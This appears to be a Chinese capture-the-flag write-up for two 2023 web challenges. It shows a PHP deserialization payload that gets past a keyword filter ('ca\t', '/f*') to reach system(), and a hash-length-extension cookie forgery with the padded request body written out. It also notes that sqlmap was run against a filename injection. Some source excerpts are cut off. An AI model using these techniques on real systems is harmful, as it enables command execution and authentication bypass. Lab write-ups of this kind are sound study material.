[楚慧杯 2023] web

文章目录

    • eaaeval
    • upload_shell


eaaeval

打开题目,源码给了用户密码
[楚慧杯 2023] web_第1张图片
登陆后啥也没有,扫一下发现源码泄露www.zip

a = 'admin';
        $this->b = 'admin';
    }

    public function __destruct(){
        if(!preg_match("/flag|system|php|cat|tac|shell|sort/i", $this->a) && !preg_match("/flag|system|php|cat|tac|shell|sort/i", $this->b)){
		system($this->a.' '.$this->b);
	    }else{
                echo "again?";
        }
    }
}
$wzbz = $_GET['wzbz'];
unserialize($wzbz);
?>

exp如下

a='ca\t';
$A->b='/f*';
echo serialize($A);

[楚慧杯 2023] web_第2张图片

upload_shell

打开题目,有个登录框,随便登录进去

得到源码

 ";
echo(md5($secret."adminpassword"));
@$username = urldecode($_POST["username"]);
@$password = urldecode($_POST["password"]);
if (!empty($_COOKIE["source"])) {
    if ($username === "admin" && $password != "password") {
         if ($_COOKIE["source"] === md5($secret.$username.$password)) {

         // 在验证用户后,如果登录成功,设置会话变量来表示用户已登录
          $_SESSION['loggedin'] = true;
          $_SESSION['username'] = 'admin'; // 用户名
          $_SESSION['role'] = 'admin'; // 用户角色或权限
          echo "";
        }
        else {
             echo "
"; die ("你的cookie好像不太对啊"); } } else { die ("可不会轻易放你进去"); } } 14 879bd10c8628894d388c068a25326c21

分析一下发现是哈希长度拓展攻击
直接脚本
在这里插入图片描述
bp抓包修改cookie

username=admin&password=password%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%d8%00%00%00%00%00%00%00ctf

成功跳转
[楚慧杯 2023] web_第3张图片
这里考点是文件上传注入,对文件名注入
直接sqlmap跑

你可能感兴趣的:(前端,android)